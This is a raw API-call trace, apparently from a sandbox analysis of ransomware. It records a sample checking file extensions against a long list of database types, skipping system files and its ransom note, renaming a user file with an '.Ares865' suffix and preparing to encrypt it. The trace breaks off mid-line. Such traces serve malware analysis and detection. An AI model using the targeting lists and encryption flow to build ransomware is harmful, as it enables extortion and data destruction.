lstrcmpiW (lpString1="LOG", lpString2="mdf") returned -1 [0057.510] lstrlenW (lpString="mdb") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="mdb") returned -1 [0057.510] lstrlenW (lpString="sql") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="sql") returned -1 [0057.510] lstrlenW (lpString="sqlite") returned 6 [0057.510] lstrcmpiW (lpString1="AT.LOG", lpString2="sqlite") returned -1 [0057.510] lstrlenW (lpString="sqlite3") returned 7 [0057.510] lstrcmpiW (lpString1="DAT.LOG", lpString2="sqlite3") returned -1 [0057.510] lstrlenW (lpString="sqlitedb") returned 8 [0057.510] lstrcmpiW (lpString1=".DAT.LOG", lpString2="sqlitedb") returned -1 [0057.510] lstrlenW (lpString="xml") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="xml") returned -1 [0057.510] lstrlenW (lpString="$er") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="$er") returned 1 [0057.510] lstrlenW (lpString="4dd") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="4dd") returned 1 [0057.510] lstrlenW (lpString="4dl") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="4dl") returned 1 [0057.510] lstrlenW (lpString="^^^") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="^^^") returned 1 [0057.510] lstrlenW (lpString="abs") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="abs") returned 1 [0057.510] lstrlenW (lpString="abx") returned 3 [0057.510] lstrcmpiW (lpString1="LOG", lpString2="abx") returned 1 [0057.510] lstrlenW (lpString="accdb") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accdb") returned 1 [0057.511] lstrlenW (lpString="accdc") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accdc") returned 1 [0057.511] lstrlenW (lpString="accde") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accde") returned 1 [0057.511] lstrlenW (lpString="accdr") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accdr") returned 1 [0057.511] lstrlenW (lpString="accdt") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accdt") returned 1 [0057.511] lstrlenW (lpString="accdw") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accdw") returned 1 [0057.511] lstrlenW (lpString="accft") returned 5 [0057.511] lstrcmpiW (lpString1="T.LOG", lpString2="accft") returned 1 [0057.511] lstrlenW (lpString="adb") returned 3 [0057.511] lstrcmpiW (lpString1="LOG", lpString2="adb") returned 1 [0057.511] lstrlenW (lpString="adb") returned 3 [0057.511] lstrcmpiW (lpString1="LOG", lpString2="adb") returned 1 [0057.511] lstrlenW (lpString="ade") returned 3 [0057.511] lstrcmpiW (lpString1="LOG", lpString2="ade") returned 1 [0057.511] lstrlenW (lpString="adf") returned 3 [0057.512] lstrcmpiW (lpString1="LOG", lpString2="adf") returned 1 [0057.512] lstrlenW (lpString="adn") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="adn") returned 1 [0057.513] lstrlenW (lpString="adp") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="adp") returned 1 [0057.513] lstrlenW (lpString="alf") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="alf") returned 1 [0057.513] lstrlenW (lpString="ask") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="ask") returned 1 [0057.513] lstrlenW (lpString="btr") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="btr") returned 1 [0057.513] lstrlenW (lpString="cat") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="cat") returned 1 [0057.513] lstrlenW (lpString="cdb") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="cdb") returned 1 [0057.513] lstrlenW (lpString="ckp") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="ckp") returned 1 [0057.513] lstrlenW (lpString="cma") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="cma") returned 1 [0057.513] lstrlenW (lpString="cpd") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="cpd") returned 1 [0057.513] lstrlenW (lpString="dacpac") returned 6 [0057.513] lstrcmpiW (lpString1="AT.LOG", lpString2="dacpac") returned -1 [0057.513] lstrlenW (lpString="dad") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="dad") returned 1 [0057.513] lstrlenW (lpString="dadiagrams") returned 10 [0057.513] lstrcmpiW (lpString1="ER.DAT.LOG", lpString2="dadiagrams") returned 1 [0057.513] lstrlenW (lpString="daschema") returned 8 [0057.513] lstrcmpiW (lpString1=".DAT.LOG", lpString2="daschema") returned -1 [0057.513] lstrlenW (lpString="db-journal") returned 10 [0057.513] lstrcmpiW (lpString1="ER.DAT.LOG", lpString2="db-journal") returned 1 [0057.513] lstrlenW (lpString="db-shm") returned 6 [0057.513] lstrcmpiW (lpString1="AT.LOG", lpString2="db-shm") returned -1 [0057.513] lstrlenW (lpString="db-wal") returned 6 [0057.513] lstrcmpiW (lpString1="AT.LOG", lpString2="db-wal") returned -1 [0057.513] lstrlenW (lpString="dbc") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="dbc") returned 1 [0057.513] lstrlenW (lpString="dbs") returned 3 [0057.513] lstrcmpiW (lpString1="LOG", lpString2="dbs") returned 1 [0057.514] lstrlenW (lpString="dbt") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dbt") returned 1 [0057.514] lstrlenW (lpString="dbv") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dbv") returned 1 [0057.514] lstrlenW (lpString="dbx") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dbx") returned 1 [0057.514] lstrlenW (lpString="dcb") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dcb") returned 1 [0057.514] lstrlenW (lpString="dct") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dct") returned 1 [0057.514] lstrlenW (lpString="dcx") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dcx") returned 1 [0057.514] lstrlenW (lpString="ddl") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="ddl") returned 1 [0057.514] lstrlenW (lpString="dlis") returned 4 [0057.514] lstrcmpiW (lpString1=".LOG", lpString2="dlis") returned -1 [0057.514] lstrlenW (lpString="dp1") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dp1") returned 1 [0057.514] lstrlenW (lpString="dqy") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dqy") returned 1 [0057.514] lstrlenW (lpString="dsk") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dsk") returned 1 [0057.514] lstrlenW (lpString="dsn") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dsn") returned 1 [0057.514] lstrlenW (lpString="dtsx") returned 4 [0057.514] lstrcmpiW (lpString1=".LOG", lpString2="dtsx") returned -1 [0057.514] lstrlenW (lpString="dxl") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="dxl") returned 1 [0057.514] lstrlenW (lpString="eco") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="eco") returned 1 [0057.514] lstrlenW (lpString="ecx") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="ecx") returned 1 [0057.514] lstrlenW (lpString="edb") returned 3 [0057.514] lstrcmpiW (lpString1="LOG", lpString2="edb") returned 1 [0057.514] lstrlenW (lpString="epim") returned 4 [0057.514] lstrcmpiW (lpString1=".LOG", lpString2="epim") returned -1 [0057.515] lstrlenW (lpString="fcd") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fcd") returned 1 [0057.515] lstrlenW (lpString="fdb") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fdb") returned 1 [0057.515] lstrlenW (lpString="fic") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fic") returned 1 [0057.515] lstrlenW (lpString="flexolibrary") returned 12 [0057.515] lstrcmpiW (lpString1="USER.DAT.LOG", lpString2="flexolibrary") returned 1 [0057.515] lstrlenW (lpString="fm5") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fm5") returned 1 [0057.515] lstrlenW (lpString="fmp") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fmp") returned 1 [0057.515] lstrlenW (lpString="fmp12") returned 5 [0057.515] lstrcmpiW (lpString1="T.LOG", lpString2="fmp12") returned 1 [0057.515] lstrlenW (lpString="fmpsl") returned 5 [0057.515] lstrcmpiW (lpString1="T.LOG", lpString2="fmpsl") returned 1 [0057.515] lstrlenW (lpString="fol") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fol") returned 1 [0057.515] lstrlenW (lpString="fp3") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fp3") returned 1 [0057.515] lstrlenW (lpString="fp4") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fp4") returned 1 [0057.515] lstrlenW (lpString="fp5") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fp5") returned 1 [0057.515] lstrlenW (lpString="fp7") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fp7") returned 1 [0057.515] lstrlenW (lpString="fpt") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="fpt") returned 1 [0057.515] lstrlenW (lpString="frm") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="frm") returned 1 [0057.515] lstrlenW (lpString="gdb") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="gdb") returned 1 [0057.515] lstrlenW (lpString="gdb") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="gdb") returned 1 [0057.515] lstrlenW (lpString="grdb") returned 4 [0057.515] lstrcmpiW (lpString1=".LOG", lpString2="grdb") returned -1 [0057.515] lstrlenW (lpString="gwi") returned 3 [0057.515] lstrcmpiW (lpString1="LOG", lpString2="gwi") returned 1 [0057.516] lstrlenW (lpString="hdb") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="hdb") returned 1 [0057.516] lstrlenW (lpString="his") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="his") returned 1 [0057.516] lstrlenW (lpString="ib") returned 2 [0057.516] lstrcmpiW (lpString1="OG", lpString2="ib") returned 1 [0057.516] lstrlenW (lpString="idb") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="idb") returned 1 [0057.516] lstrlenW (lpString="ihx") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="ihx") returned 1 [0057.516] lstrlenW (lpString="itdb") returned 4 [0057.516] lstrcmpiW (lpString1=".LOG", lpString2="itdb") returned -1 [0057.516] lstrlenW (lpString="itw") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="itw") returned 1 [0057.516] lstrlenW (lpString="jet") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="jet") returned 1 [0057.516] lstrlenW (lpString="jtx") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="jtx") returned 1 [0057.516] lstrlenW (lpString="kdb") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="kdb") returned 1 [0057.516] lstrlenW (lpString="kexi") returned 4 [0057.516] lstrcmpiW (lpString1=".LOG", lpString2="kexi") returned -1 [0057.516] lstrlenW (lpString="kexic") returned 5 [0057.516] lstrcmpiW (lpString1="T.LOG", lpString2="kexic") returned 1 [0057.516] lstrlenW (lpString="kexis") returned 5 [0057.516] lstrcmpiW (lpString1="T.LOG", lpString2="kexis") returned 1 [0057.516] lstrlenW (lpString="lgc") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="lgc") returned 1 [0057.516] lstrlenW (lpString="lwx") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="lwx") returned -1 [0057.516] lstrlenW (lpString="maf") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="maf") returned -1 [0057.516] lstrlenW (lpString="maq") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="maq") returned -1 [0057.516] lstrlenW (lpString="mar") returned 3 [0057.516] lstrcmpiW (lpString1="LOG", lpString2="mar") returned -1 [0057.516] lstrlenW (lpString="marshal") returned 7 [0057.517] lstrcmpiW (lpString1="DAT.LOG", lpString2="marshal") returned -1 [0057.517] lstrlenW (lpString="mas") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mas") returned -1 [0057.517] lstrlenW (lpString="mav") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mav") returned -1 [0057.517] lstrlenW (lpString="maw") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="maw") returned -1 [0057.517] lstrlenW (lpString="mdbhtml") returned 7 [0057.517] lstrcmpiW (lpString1="DAT.LOG", lpString2="mdbhtml") returned -1 [0057.517] lstrlenW (lpString="mdn") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mdn") returned -1 [0057.517] lstrlenW (lpString="mdt") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mdt") returned -1 [0057.517] lstrlenW (lpString="mfd") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mfd") returned -1 [0057.517] lstrlenW (lpString="mpd") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mpd") returned -1 [0057.517] lstrlenW (lpString="mrg") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mrg") returned -1 [0057.517] lstrlenW (lpString="mud") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mud") returned -1 [0057.517] lstrlenW (lpString="mwb") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="mwb") returned -1 [0057.517] lstrlenW (lpString="myd") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="myd") returned -1 [0057.517] lstrlenW (lpString="ndf") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="ndf") returned -1 [0057.517] lstrlenW (lpString="nnt") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="nnt") returned -1 [0057.517] lstrlenW (lpString="nrmlib") returned 6 [0057.517] lstrcmpiW (lpString1="AT.LOG", lpString2="nrmlib") returned -1 [0057.517] lstrlenW (lpString="ns2") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="ns2") returned -1 [0057.517] lstrlenW (lpString="ns3") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="ns3") returned -1 [0057.517] lstrlenW (lpString="ns4") returned 3 [0057.517] lstrcmpiW (lpString1="LOG", lpString2="ns4") returned -1 [0057.517] lstrlenW (lpString="nsf") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="nsf") returned -1 [0057.518] lstrlenW (lpString="nv") returned 2 [0057.518] lstrcmpiW (lpString1="OG", lpString2="nv") returned 1 [0057.518] lstrlenW (lpString="nv2") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="nv2") returned -1 [0057.518] lstrlenW (lpString="nwdb") returned 4 [0057.518] lstrcmpiW (lpString1=".LOG", lpString2="nwdb") returned -1 [0057.518] lstrlenW (lpString="nyf") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="nyf") returned -1 [0057.518] lstrlenW (lpString="odb") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="odb") returned -1 [0057.518] lstrlenW (lpString="odb") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="odb") returned -1 [0057.518] lstrlenW (lpString="oqy") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="oqy") returned -1 [0057.518] lstrlenW (lpString="ora") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="ora") returned -1 [0057.518] lstrlenW (lpString="orx") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="orx") returned -1 [0057.518] lstrlenW (lpString="owc") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="owc") returned -1 [0057.518] lstrlenW (lpString="p96") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="p96") returned -1 [0057.518] lstrlenW (lpString="p97") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="p97") returned -1 [0057.518] lstrlenW (lpString="pan") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="pan") returned -1 [0057.518] lstrlenW (lpString="pdb") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="pdb") returned -1 [0057.518] lstrlenW (lpString="pdm") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="pdm") returned -1 [0057.518] lstrlenW (lpString="pnz") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="pnz") returned -1 [0057.518] lstrlenW (lpString="qry") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="qry") returned -1 [0057.518] lstrlenW (lpString="qvd") returned 3 [0057.518] lstrcmpiW (lpString1="LOG", lpString2="qvd") returned -1 [0057.519] lstrlenW (lpString="rbf") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="rbf") returned -1 [0057.519] lstrlenW (lpString="rctd") returned 4 [0057.519] lstrcmpiW (lpString1=".LOG", lpString2="rctd") returned -1 [0057.519] lstrlenW (lpString="rod") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="rod") returned -1 [0057.519] lstrlenW (lpString="rodx") returned 4 [0057.519] lstrcmpiW (lpString1=".LOG", lpString2="rodx") returned -1 [0057.519] lstrlenW (lpString="rpd") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="rpd") returned -1 [0057.519] lstrlenW (lpString="rsd") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="rsd") returned -1 [0057.519] lstrlenW (lpString="sas7bdat") returned 8 [0057.519] lstrcmpiW (lpString1=".DAT.LOG", lpString2="sas7bdat") returned -1 [0057.519] lstrlenW (lpString="sbf") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="sbf") returned -1 [0057.519] lstrlenW (lpString="scx") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="scx") returned -1 [0057.519] lstrlenW (lpString="sdb") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="sdb") returned -1 [0057.519] lstrlenW (lpString="sdc") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="sdc") returned -1 [0057.519] lstrlenW (lpString="sdf") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="sdf") returned -1 [0057.519] lstrlenW (lpString="sis") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="sis") returned -1 [0057.519] lstrlenW (lpString="spq") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="spq") returned -1 [0057.519] lstrlenW (lpString="te") returned 2 [0057.519] lstrcmpiW (lpString1="OG", lpString2="te") returned -1 [0057.519] lstrlenW (lpString="teacher") returned 7 [0057.519] lstrcmpiW (lpString1="DAT.LOG", lpString2="teacher") returned -1 [0057.519] lstrlenW (lpString="tmd") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="tmd") returned -1 [0057.519] lstrlenW (lpString="tps") returned 3 [0057.519] lstrcmpiW (lpString1="LOG", lpString2="tps") returned -1 [0057.520] lstrlenW (lpString="trc") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="trc") returned -1 [0057.520] lstrlenW (lpString="trc") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="trc") returned -1 [0057.520] lstrlenW (lpString="trm") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="trm") returned -1 [0057.520] lstrlenW (lpString="udb") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="udb") returned -1 [0057.520] lstrlenW (lpString="udl") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="udl") returned -1 [0057.520] lstrlenW (lpString="usr") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="usr") returned -1 [0057.520] lstrlenW (lpString="v12") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="v12") returned -1 [0057.520] lstrlenW (lpString="vis") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="vis") returned -1 [0057.520] lstrlenW (lpString="vpd") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="vpd") returned -1 [0057.520] lstrlenW (lpString="vvv") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="vvv") returned -1 [0057.520] lstrlenW (lpString="wdb") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="wdb") returned -1 [0057.520] lstrlenW (lpString="wmdb") returned 4 [0057.520] lstrcmpiW (lpString1=".LOG", lpString2="wmdb") returned -1 [0057.520] lstrlenW (lpString="wrk") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="wrk") returned -1 [0057.520] lstrlenW (lpString="xdb") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="xdb") returned -1 [0057.520] lstrlenW (lpString="xld") returned 3 [0057.520] lstrcmpiW (lpString1="LOG", lpString2="xld") returned -1 [0057.520] lstrlenW (lpString="xmlff") returned 5 [0057.520] lstrcmpiW (lpString1="T.LOG", lpString2="xmlff") returned -1 [0057.520] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\NTUSER.DAT.LOG.Ares865") returned 44 [0057.520] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default user\\ntuser.dat.log"), lpNewFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat.log.ares865"), dwFlags=0x1) returned 1 [0057.521] CreateFileW (lpFileName="C:\\Users\\Default User\\NTUSER.DAT.LOG.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.522] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1024) returned 1 [0057.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.522] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.523] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.523] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.523] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x164 [0057.524] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0057.526] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.527] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.527] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.527] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.528] CloseHandle (hObject=0x164) returned 1 [0057.528] CloseHandle (hObject=0x15c) returned 1 [0057.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.529] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="aoldtz.exe") returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="windows") returned -1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="bootmgr") returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="temp") returned -1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="pagefile.sys") returned -1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="boot") returned 1 [0057.529] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ids.txt") returned 1 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat") returned 1 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="perflogs") returned -1 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="MSBuild") returned 1 [0057.530] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0057.530] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT.LOG") returned 36 [0057.530] lstrcpyW (in: lpString1=0x2cce42c, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0057.530] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0057.530] lstrlenW (lpString="Ares865") returned 7 [0057.530] lstrcmpiW (lpString1="AT.LOG1", lpString2="Ares865") returned 1 [0057.530] lstrlenW (lpString=".dll") returned 4 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".dll") returned 1 [0057.530] lstrlenW (lpString=".lnk") returned 4 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".lnk") returned 1 [0057.530] lstrlenW (lpString=".ini") returned 4 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".ini") returned 1 [0057.530] lstrlenW (lpString=".sys") returned 4 [0057.530] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2=".sys") returned 1 [0057.530] lstrlenW (lpString="NTUSER.DAT.LOG1") returned 15 [0057.530] lstrlenW (lpString="bak") returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="bak") returned 1 [0057.530] lstrlenW (lpString="ba_") returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="ba_") returned 1 [0057.530] lstrlenW (lpString="dbb") returned 3 [0057.530] lstrcmpiW (lpString1="OG1", lpString2="dbb") returned 1 [0057.530] lstrlenW (lpString="vmdk") returned 4 [0057.530] lstrcmpiW (lpString1="LOG1", lpString2="vmdk") returned -1 [0057.530] lstrlenW (lpString="rar") 